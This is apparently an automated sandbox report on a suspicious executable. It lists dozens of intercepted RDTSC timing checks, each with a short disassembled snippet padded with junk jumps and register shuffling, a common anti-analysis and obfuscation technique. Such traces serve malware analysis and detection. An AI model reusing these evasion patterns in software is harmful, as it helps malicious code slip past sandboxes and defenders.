Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1507 second address: 70B1560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDAC110B299h 0x0000000a add ax, 36A6h 0x0000000f jmp 00007FDAC110B291h 0x00000014 popfd 0x00000015 popad 0x00000016 mov eax, 7DB4F9D7h 0x0000001b popad 0x0000001c or dword ptr [edx+40h], FFFFFFFFh 0x00000020 jmp 00007FDAC110B28Ah 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FDAC110B28Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1560 second address: 70B1564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1564 second address: 70B156A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B156A second address: 70B1596 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC0B0C807h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70B1596 second address: 70B15C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC110B28Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7100C42 second address: 7100CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDAC0B0C801h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FDAC0B0C7FFh 0x0000001b and ecx, 017102BEh 0x00000021 jmp 00007FDAC0B0C809h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A07BE second address: 70A07EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAC110B297h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A07EE second address: 70A0806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC0B0C804h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040008 second address: 704000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 704000C second address: 7040012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040012 second address: 7040036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDAC110B290h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040036 second address: 704003C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 704003C second address: 704005A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDAC110B291h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70405C6 second address: 704060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C809h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDAC0B0C7FEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDAC0B0C807h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 704060D second address: 7040613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040613 second address: 7040617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040617 second address: 704061B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040A3B second address: 7040AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FDAC0B0C804h 0x00000011 xor eax, 3E5C6488h 0x00000017 jmp 00007FDAC0B0C7FBh 0x0000001c popfd 0x0000001d mov edi, eax 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 push esi 0x00000024 mov si, di 0x00000027 pop ebx 0x00000028 pushfd 0x00000029 jmp 00007FDAC0B0C808h 0x0000002e add ecx, 3D6BBA18h 0x00000034 jmp 00007FDAC0B0C7FBh 0x00000039 popfd 0x0000003a popad 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7040AB1 second address: 7040AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 709091E second address: 7090922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7090922 second address: 7090926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7090926 second address: 709092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 709092C second address: 7090A44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e pushfd 0x0000000f jmp 00007FDAC110B293h 0x00000014 add cx, D57Eh 0x00000019 jmp 00007FDAC110B299h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FDAC110B297h 0x00000028 jmp 00007FDAC110B293h 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007FDAC110B298h 0x00000034 sbb eax, 210AEA08h 0x0000003a jmp 00007FDAC110B28Bh 0x0000003f popfd 0x00000040 popad 0x00000041 xchg eax, ebp 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FDAC110B294h 0x00000049 sub eax, 4A640C68h 0x0000004f jmp 00007FDAC110B28Bh 0x00000054 popfd 0x00000055 jmp 00007FDAC110B298h 0x0000005a popad 0x0000005b mov ebp, esp 0x0000005d pushad 0x0000005e mov bx, ax 0x00000061 jmp 00007FDAC110B28Ah 0x00000066 popad 0x00000067 pop ebp 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FDAC110B297h 0x0000006f rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060CD6 second address: 7060D45 instructions: 0x00000000 rdtsc 0x00000002 call 00007FDAC0B0C808h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FDAC0B0C800h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov ecx, 28892783h 0x00000019 pushfd 0x0000001a jmp 00007FDAC0B0C808h 0x0000001f or esi, 055EFB48h 0x00000025 jmp 00007FDAC0B0C7FBh 0x0000002a popfd 0x0000002b popad 0x0000002c movzx esi, bx 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060D45 second address: 7060D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060D49 second address: 7060D4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060D4F second address: 7060D63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF0h 0x0000000c pushad 0x0000000d mov ax, bx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060D63 second address: 7060DE3 instructions: 0x00000000 rdtsc 0x00000002 mov al, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 44h 0x0000000a pushad 0x0000000b push esi 0x0000000c mov edx, 669199C6h 0x00000011 pop edi 0x00000012 mov si, EB23h 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 push esi 0x0000001a pushfd 0x0000001b jmp 00007FDAC0B0C7FBh 0x00000020 and ax, A84Eh 0x00000025 jmp 00007FDAC0B0C809h 0x0000002a popfd 0x0000002b pop eax 0x0000002c mov di, 0344h 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FDAC0B0C7FFh 0x0000003b xor ax, 965Eh 0x00000040 jmp 00007FDAC0B0C809h 0x00000045 popfd 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060DE3 second address: 7060DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060DE8 second address: 7060E42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C807h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d pushad 0x0000000e call 00007FDAC0B0C7FEh 0x00000013 pop ecx 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FDAC0B0C7FAh 0x0000001e mov dword ptr [esp], esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FDAC0B0C807h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060E42 second address: 7060E76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov bx, 8206h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebp 0x0000000e jmp 00007FDAC110B28Ah 0x00000013 mov dword ptr [esp], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDAC110B297h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060E76 second address: 7060EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 jmp 00007FDAC0B0C7FBh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edi, dword ptr [ebp+08h] 0x00000011 jmp 00007FDAC0B0C806h 0x00000016 mov dword ptr [esp+24h], 00000000h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FDAC0B0C807h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060EC4 second address: 7060F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDAC110B28Fh 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d lock bts dword ptr [edi], 00000000h 0x00000012 jmp 00007FDAC110B292h 0x00000017 jc 00007FDB30F7C7C7h 0x0000001d pushad 0x0000001e mov cx, EC0Dh 0x00000022 mov si, 3C09h 0x00000026 popad 0x00000027 pop edi 0x00000028 pushad 0x00000029 jmp 00007FDAC110B292h 0x0000002e mov ecx, 7F239EB1h 0x00000033 popad 0x00000034 pop esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060F23 second address: 7060F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060F27 second address: 7060F40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B295h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060F40 second address: 7060F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060F46 second address: 7060F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060F4A second address: 7060F67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDAC0B0C802h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7060F67 second address: 7060F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC110B28Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0824 second address: 70A082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A082C second address: 70A0832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0832 second address: 70A0836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0836 second address: 70A0872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B295h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FDAC110B28Eh 0x00000011 push eax 0x00000012 jmp 00007FDAC110B28Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0872 second address: 70A0889 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 79622DE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, C1h 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movzx esi, di 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7090859 second address: 7090869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAC110B28Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7090869 second address: 70908AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C7FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDAC0B0C804h 0x00000013 or eax, 451A9708h 0x00000019 jmp 00007FDAC0B0C7FBh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 mov esi, 2051A195h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70908AA second address: 70908D9 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FDAC110B297h 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov dl, ah 0x00000011 mov eax, edx 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov edi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70908D9 second address: 70908DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0A4C second address: 70A0A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0A61 second address: 70A0AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FDAC0B0C7FCh 0x00000010 mov ah, 08h 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FDAC0B0C7FCh 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDAC0B0C7FAh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0AA3 second address: 70A0AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0AA7 second address: 70A0AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0AAD second address: 70A0AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B28Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0AC7 second address: 70A0ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0ACB second address: 70A0AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0AD1 second address: 70A0B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDAC0B0C807h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70A0B05 second address: 70A0B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov ax, A733h 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 push dword ptr [ebp+08h] 0x00000017 pushad 0x00000018 jmp 00007FDAC110B290h 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ah, AEh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7110892 second address: 7110898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7110898 second address: 711090E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FDAC110B294h 0x00000014 and cx, F158h 0x00000019 jmp 00007FDAC110B28Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FDAC110B298h 0x00000025 or eax, 3BBCFBB8h 0x0000002b jmp 00007FDAC110B28Bh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dl, byte ptr [ebp+14h] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 711090E second address: 711093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDAC0B0C801h 0x0000000a or ax, 3656h 0x0000000f jmp 00007FDAC0B0C801h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 711093C second address: 71109A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC110B291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+10h] 0x0000000c jmp 00007FDAC110B28Eh 0x00000011 and dl, 00000007h 0x00000014 jmp 00007FDAC110B290h 0x00000019 test eax, eax 0x0000001b jmp 00007FDAC110B290h 0x00000020 je 00007FDB30EF0AF1h 0x00000026 pushad 0x00000027 movzx esi, dx 0x0000002a mov bh, C5h 0x0000002c popad 0x0000002d sub ecx, ecx 0x0000002f jmp 00007FDAC110B28Bh 0x00000034 inc ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 71109A8 second address: 71109AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 71109AE second address: 71109B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 71109B6 second address: 71109D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 shr eax, 1 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FDAC0B0C7FAh 0x00000011 pop ecx 0x00000012 mov bh, E6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 70F0D57 second address: 70F0DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FDAC110B28Fh 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 pushfd 0x00000017 jmp 00007FDAC110B291h 0x0000001c xor cl, 00000006h 0x0000001f jmp 00007FDAC110B291h 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FDAC110B28Ch 0x0000002f xor ah, FFFFFFA8h 0x00000032 jmp 00007FDAC110B28Bh 0x00000037 popfd 0x00000038 mov ch, 21h 0x0000003a popad 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FDAC110B28Eh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7100461 second address: 7100465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 7100465 second address: 710046B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AD4q0qFvM8.exe RDTSC instruction interceptor: First address: 710046B second address: 710053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAC0B0C804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDAC0B0C7FBh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov eax, 47D4B2EBh 0x00000016 mov dl, al 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FDAC0B0C803h 0x00000020 xchg eax, ebx 0x00000021 jmp 00007FDAC0B0C806h 0x00000026 push eax 0x00000027 jmp 00007FDAC0B0C7FBh 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e movzx eax, dx 0x00000031 pushfd 0x00000032 jmp 00007FDAC0B0C801h 0x00000037 and esi, 64E20576h 0x0000003d jmp 00007FDAC0B0C801h 0x00000042 popfd 0x00000043 popad 0x00000044 xchg eax, esi 0x00000045 jmp 00007FDAC0B0C7FEh 0x0000004a push eax 0x0000004b pushad 0x0000004c mov bh, 90h 0x0000004e mov dl, al 0x00000050 popad 0x00000051 xchg eax, esi 0x00000052 jmp 00007FDAC0B0C805h 0x00000057 mov esi, dword ptr [ebp+08h] 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FDAC0B0C7FDh 0x00000061 rdtsc
